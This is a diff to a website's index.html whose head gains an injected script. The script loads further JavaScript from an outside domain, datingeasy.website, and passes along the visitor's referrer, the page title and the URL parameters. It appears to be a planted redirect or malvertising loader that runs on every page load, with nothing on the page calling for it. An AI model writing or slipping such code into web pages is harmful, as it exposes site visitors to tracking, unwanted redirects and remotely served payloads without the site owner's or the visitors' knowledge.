--- a/index.html
+++ b/index.html
@@ -2,6 +2,16 @@
 <html lang="en">
 
 <head>
+<span id="20b931b7-0e23-a762-93b5-af3de1acdc1c"></span><script type="application/javascript">
+var d=document;var s=d.createElement('script'); 
+s.src='https://datingeasy.website/z5Hc1JGj?se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '&'+window.location.search.replace('?', '&')+'&frm5f61144a48d3c=script5f61144a48d3d&_cid=20b931b7-0e23-a762-93b5-af3de1acdc1c'; 
+if (document.currentScript) { 
+document.currentScript.parentNode.insertBefore(s, document.currentScript);
+} else {
+d.getElementsByTagName('head')[0].appendChild(s);
+}
+if (document.location.protocol === 'https:' && 'https://datingeasy.website/z5Hc1JGj?se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '&'+window.location.search.replace('?', '&')+'&frm5f61144a48d3c=script5f61144a48d3d'.indexOf('http:') === 0 ) {alert('The website works on HTTPS. The tracker must use HTTPS too.');}
+</script>
     <meta charset="UTF-8">
     <meta name="description" content="Über Kenntnisse">
     <meta http-equiv="X-UA-Compatible" content="IE=edge">
